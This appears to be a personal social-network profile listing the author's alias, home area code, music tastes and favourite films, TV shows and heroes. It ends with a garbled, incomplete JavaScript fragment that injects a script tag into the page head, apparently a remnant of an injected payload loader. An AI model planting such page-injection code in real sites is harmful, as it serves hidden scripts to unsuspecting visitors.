My name is 5H4WN V42. Born and raised in the (203). I love cars, house music, tattoo's and cheecha.
I've already met the only girl I need.
Music is my life. Anything but country.
Stranger than fiction, Saw 2, Rules of Attraction, Batman begins, the ringer, The Matrix Trilogy, The Departed, Saving private ryan, Fearless, Blow, O, Half Baked, Tommy Boy, Harold and Kumar, Kids, The Godfather Trilogy, Casino, Good Fellas, Donny Brasco, Napolean Dynamite, Devil's Advocate, Requiem for a dream, Man on fire, empire records,
Soprano's, Entourage, Lucky Louie, Miami ink, myth busters, Family Guy, Adult Swim, King of Queens, Seinfeld....
All the books I read throughout my 15 years of education
People who make a difference in other peoples lives. .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);"